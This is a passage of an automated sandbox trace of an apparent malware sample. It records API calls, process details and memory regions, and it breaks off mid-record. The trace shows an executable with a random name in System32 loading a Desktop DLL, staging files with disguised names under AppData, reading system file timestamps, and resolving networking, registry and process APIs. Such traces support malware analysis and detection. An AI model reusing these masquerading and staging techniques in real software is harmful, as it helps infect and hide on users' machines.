returned 0x0 [0037.030] SetLastError (dwErrCode=0x0) [0037.030] GetLastError () returned 0x0 [0037.030] SetLastError (dwErrCode=0x0) [0037.030] GetLastError () returned 0x0 [0037.030] SetLastError (dwErrCode=0x0) [0037.030] GetLastError () returned 0x0 [0037.030] SetLastError (dwErrCode=0x0) [0037.030] GetLastError () returned 0x0 [0037.030] SetLastError (dwErrCode=0x0) [0037.030] GetLastError () returned 0x0 [0037.030] SetLastError (dwErrCode=0x0) [0037.030] GetLastError () returned 0x0 [0037.030] SetLastError (dwErrCode=0x0) [0037.030] GetLastError () returned 0x0 [0037.030] SetLastError (dwErrCode=0x0) [0037.030] GetLastError () returned 0x0 [0037.031] SetLastError (dwErrCode=0x0) [0037.031] GetLastError () returned 0x0 [0037.031] SetLastError (dwErrCode=0x0) [0037.031] GetLastError () returned 0x0 [0037.031] SetLastError (dwErrCode=0x0) [0037.031] GetLastError () returned 0x0 [0037.031] SetLastError (dwErrCode=0x0) [0037.031] GetLastError () returned 0x0 [0037.031] SetLastError (dwErrCode=0x0) [0037.031] GetLastError () returned 0x0 [0037.031] SetLastError (dwErrCode=0x0) [0037.031] GetLastError () returned 0x0 [0037.031] SetLastError (dwErrCode=0x0) [0037.031] GetLastError () returned 0x0 [0037.031] SetLastError (dwErrCode=0x0) [0037.031] GetLastError () returned 0x0 [0037.031] SetLastError (dwErrCode=0x0) [0037.031] GetLastError () returned 0x0 [0037.031] SetLastError (dwErrCode=0x0) [0037.031] GetLastError () returned 0x0 [0037.031] SetLastError (dwErrCode=0x0) [0037.031] GetLastError () returned 0x0 [0037.031] SetLastError (dwErrCode=0x0) [0037.031] GetLastError () returned 0x0 [0037.031] SetLastError (dwErrCode=0x0) [0037.031] GetLastError () returned 0x0 [0037.032] SetLastError (dwErrCode=0x0) [0037.032] GetLastError () returned 0x0 [0037.032] SetLastError (dwErrCode=0x0) [0037.032] GetLastError () returned 0x0 [0037.032] SetLastError (dwErrCode=0x0) [0037.032] GetLastError () returned 0x0 [0037.032] SetLastError (dwErrCode=0x0) [0037.032] GetLastError () returned 0x0 [0037.032] SetLastError (dwErrCode=0x0) [0037.032] GetLastError () returned 0x0 [0037.032] SetLastError (dwErrCode=0x0) [0037.032] GetLastError () returned 0x0 [0037.032] SetLastError (dwErrCode=0x0) [0037.032] GetLastError () returned 0x0 [0037.032] SetLastError (dwErrCode=0x0) [0037.032] GetLastError () returned 0x0 [0037.032] SetLastError (dwErrCode=0x0) [0037.032] GetLastError () returned 0x0 [0037.032] SetLastError (dwErrCode=0x0) [0037.032] GetLastError () returned 0x0 [0037.032] SetLastError (dwErrCode=0x0) [0037.032] GetLastError () returned 0x0 [0037.032] SetLastError (dwErrCode=0x0) [0037.032] GetLastError () returned 0x0 [0037.032] SetLastError (dwErrCode=0x0) [0037.032] GetLastError () returned 0x0 [0037.033] SetLastError (dwErrCode=0x0) [0037.033] GetLastError () returned 0x0 [0037.033] SetLastError (dwErrCode=0x0) [0037.033] GetLastError () returned 0x0 [0037.033] SetLastError (dwErrCode=0x0) [0037.033] GetLastError () returned 0x0 [0037.033] SetLastError (dwErrCode=0x0) [0037.033] GetLastError () returned 0x0 [0037.033] SetLastError (dwErrCode=0x0) [0037.033] GetLastError () returned 0x0 [0037.033] SetLastError (dwErrCode=0x0) [0037.033] GetLastError () returned 0x0 [0037.033] SetLastError (dwErrCode=0x0) [0037.033] GetLastError () returned 0x0 [0037.033] SetLastError (dwErrCode=0x0) [0037.033] GetLastError () returned 0x0 [0037.033] SetLastError (dwErrCode=0x0) [0037.033] GetLastError () returned 0x0 [0037.033] SetLastError (dwErrCode=0x0) [0037.033] GetLastError () returned 0x0 [0037.033] SetLastError (dwErrCode=0x0) [0037.033] GetLastError () returned 0x0 [0037.033] SetLastError (dwErrCode=0x0) [0037.033] GetLastError () returned 0x0 [0037.033] SetLastError (dwErrCode=0x0) [0037.034] GetLastError () returned 0x0 [0037.034] SetLastError (dwErrCode=0x0) [0037.034] GetLastError () returned 0x0 [0037.034] SetLastError (dwErrCode=0x0) [0037.034] GetLastError () returned 0x0 [0037.034] SetLastError (dwErrCode=0x0) [0037.034] GetLastError () returned 0x0 [0037.034] SetLastError (dwErrCode=0x0) [0037.034] GetLastError () returned 0x0 [0037.034] SetLastError (dwErrCode=0x0) [0037.034] GetLastError () returned 0x0 [0037.034] SetLastError (dwErrCode=0x0) [0037.034] GetLastError () returned 0x0 [0037.034] SetLastError (dwErrCode=0x0) [0037.034] GetLastError () returned 0x0 [0037.034] SetLastError (dwErrCode=0x0) [0037.034] GetLastError () returned 0x0 [0037.034] SetLastError (dwErrCode=0x0) [0037.034] GetLastError () returned 0x0 [0037.034] SetLastError (dwErrCode=0x0) [0037.034] GetLastError () returned 0x0 [0037.034] SetLastError (dwErrCode=0x0) [0037.034] GetLastError () returned 0x0 [0037.034] SetLastError (dwErrCode=0x0) [0037.034] GetLastError () returned 0x0 [0037.035] SetLastError (dwErrCode=0x0) [0037.035] GetLastError () returned 0x0 [0037.035] SetLastError (dwErrCode=0x0) [0037.035] GetLastError () returned 0x0 [0037.035] SetLastError (dwErrCode=0x0) [0037.035] GetLastError () returned 0x0 [0037.035] SetLastError (dwErrCode=0x0) [0037.035] GetLastError () returned 0x0 [0037.035] SetLastError (dwErrCode=0x0) [0037.035] GetLastError () returned 0x0 [0037.035] SetLastError (dwErrCode=0x0) [0037.035] GetLastError () returned 0x0 [0037.035] SetLastError (dwErrCode=0x0) [0037.035] GetLastError () returned 0x0 [0037.035] SetLastError (dwErrCode=0x0) [0037.035] GetLastError () returned 0x0 [0037.035] SetLastError (dwErrCode=0x0) [0037.035] GetLastError () returned 0x0 [0037.035] SetLastError (dwErrCode=0x0) [0037.035] GetLastError () returned 0x0 [0037.035] SetLastError (dwErrCode=0x0) [0037.035] GetLastError () returned 0x0 [0037.035] SetLastError (dwErrCode=0x0) [0037.035] GetLastError () returned 0x0 [0037.035] SetLastError (dwErrCode=0x0) [0037.036] GetLastError () returned 0x0 [0037.036] SetLastError (dwErrCode=0x0) [0037.036] GetLastError () returned 0x0 [0037.036] SetLastError (dwErrCode=0x0) [0037.036] GetLastError () returned 0x0 [0037.036] SetLastError (dwErrCode=0x0) [0037.036] GetLastError () returned 0x0 [0037.036] SetLastError (dwErrCode=0x0) [0037.036] GetLastError () returned 0x0 [0037.036] SetLastError (dwErrCode=0x0) [0037.036] GetLastError () returned 0x0 [0037.036] SetLastError (dwErrCode=0x0) [0037.036] GetLastError () returned 0x0 [0037.036] SetLastError (dwErrCode=0x0) [0037.036] GetLastError () returned 0x0 [0037.036] SetLastError (dwErrCode=0x0) [0037.036] GetLastError () returned 0x0 [0037.036] SetLastError (dwErrCode=0x0) [0037.036] GetLastError () returned 0x0 [0037.036] SetLastError (dwErrCode=0x0) [0037.036] GetLastError () returned 0x0 [0037.036] SetLastError (dwErrCode=0x0) [0037.036] GetLastError () returned 0x0 [0037.036] SetLastError (dwErrCode=0x0) [0037.036] GetLastError () returned 0x0 [0037.036] SetLastError (dwErrCode=0x0) [0037.037] GetLastError () returned 0x0 [0037.037] SetLastError (dwErrCode=0x0) [0037.037] GetLastError () returned 0x0 [0037.037] SetLastError (dwErrCode=0x0) [0037.037] GetLastError () returned 0x0 [0037.037] SetLastError (dwErrCode=0x0) [0037.037] GetLastError () returned 0x0 [0037.037] SetLastError (dwErrCode=0x0) [0037.037] GetLastError () returned 0x0 [0037.037] SetLastError (dwErrCode=0x0) [0037.037] GetLastError () returned 0x0 [0037.037] SetLastError (dwErrCode=0x0) [0037.037] GetLastError () returned 0x0 [0037.037] SetLastError (dwErrCode=0x0) [0037.037] GetLastError () returned 0x0 [0037.037] SetLastError (dwErrCode=0x0) [0037.037] GetLastError () returned 0x0 [0037.037] SetLastError (dwErrCode=0x0) [0037.037] GetLastError () returned 0x0 [0037.037] SetLastError (dwErrCode=0x0) [0037.037] GetLastError () returned 0x0 [0037.037] SetLastError (dwErrCode=0x0) [0037.037] GetLastError () returned 0x0 [0037.037] SetLastError (dwErrCode=0x0) [0037.037] GetLastError () returned 0x0 [0037.037] SetLastError (dwErrCode=0x0) [0037.038] GetLastError () returned 0x0 [0037.038] SetLastError (dwErrCode=0x0) [0037.038] GetLastError () returned 0x0 [0037.038] SetLastError (dwErrCode=0x0) [0037.038] GetLastError () returned 0x0 [0037.038] SetLastError (dwErrCode=0x0) [0037.038] GetLastError () returned 0x0 [0037.038] SetLastError (dwErrCode=0x0) [0037.038] GetLastError () returned 0x0 [0037.038] SetLastError (dwErrCode=0x0) [0037.038] GetLastError () returned 0x0 [0037.038] SetLastError (dwErrCode=0x0) [0037.038] GetLastError () returned 0x0 [0037.038] SetLastError (dwErrCode=0x0) [0037.039] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0037.039] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0037.039] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0037.040] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2af8e8 | out: lpSystemTimeAsFileTime=0x2af8e8*(dwLowDateTime=0xe3c388b0, dwHighDateTime=0x1d3dfba)) [0037.040] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x2af820, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0037.040] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x2af708, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0037.040] GetLastError () returned 0x0 [0037.041] GetLastError () returned 0x0 [0037.041] GetLastError () returned 0x0 [0037.041] GetLastError () returned 0x0 [0037.041] GetLastError () returned 0x0 [0037.041] GetLastError () returned 0x0 [0037.041] GetLastError () returned 0x0 [0037.041] GetLastError () returned 0x0 [0037.041] GetLastError () returned 0x0 [0037.041] GetLastError () returned 0x0 [0037.041] GetLastError () returned 0x0 [0037.041] GetLastError () returned 0x0 [0037.041] GetLastError () returned 0x0 [0037.041] GetLastError () returned 0x0 [0037.041] GetLastError () returned 0x0 [0037.041] GetLastError () returned 0x0 [0037.041] GetLastError () returned 0x0 [0037.041] GetLastError () returned 0x0 [0037.041] GetLastError () returned 0x0 [0037.041] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0037.041] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0037.041] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0037.041] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0037.041] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0037.041] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0037.041] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0037.042] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0037.042] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0037.042] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0037.042] GetLastError () returned 0xb7 [0037.042] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0037.042] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0037.042] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0037.042] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0037.042] wsprintfA (in: param_1=0x2af588, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0037.042] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0037.042] wsprintfA (in: param_1=0x2af484, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0037.042] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0037.042] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0037.042] CloseHandle (hObject=0x74) returned 1 [0037.042] GetLastError () returned 0x0 [0037.043] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0037.043] GetLastError () returned 0x0 [0037.043] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0037.043] GetSystemDirectoryA (in: lpBuffer=0x2af588, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0037.043] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0037.043] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0037.043] CloseHandle (hObject=0x74) returned 1 [0037.043] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0037.043] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0037.043] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0037.045] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0037.045] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0037.045] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0037.045] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0037.045] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0037.045] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0037.046] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0037.046] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0037.046] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0037.046] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0037.046] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0037.046] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0037.046] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0037.046] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0037.046] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0037.046] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0037.046] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0037.046] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0037.046] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0037.046] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0037.047] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0037.047] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0037.047] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0037.047] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0037.047] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0037.047] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0037.047] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0037.047] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0037.047] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0037.047] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0037.047] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0037.047] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0037.047] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0037.047] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0037.047] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0037.048] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0037.048] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0037.048] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0037.048] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0037.048] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0037.048] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0037.048] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0037.048] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0037.048] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0037.048] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0037.048] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0037.048] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0037.048] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0037.048] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0037.048] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0037.049] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0037.049] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0037.049] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0037.049] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0037.049] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0037.049] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0037.049] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0037.049] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0037.049] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0037.049] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0037.050] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0037.050] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0037.050] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0037.050] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0037.050] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0037.077] Entry () [0037.077] GetMessageA (lpMsg=0x2afc0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0) Process: id = "73" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4fb80" os_pid = "0xebc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=InstallW /fn_args=\"%Temp%\\IXP000.TMP\\\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3190 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3191 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3192 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3193 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3194 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 3195 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3196 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3197 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3198 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 3199 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 3200 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3201 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3202 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 3203 start_va = 0x4d0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 3204 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3205 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3206 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 3207 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 3208 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 3209 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 3210 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3211 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3212 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3213 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3214 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3215 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 3216 start_va = 0x3f0000 end_va = 0x4b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 3217 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3218 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3219 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3220 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 3221 start_va = 0x4e0000 end_va 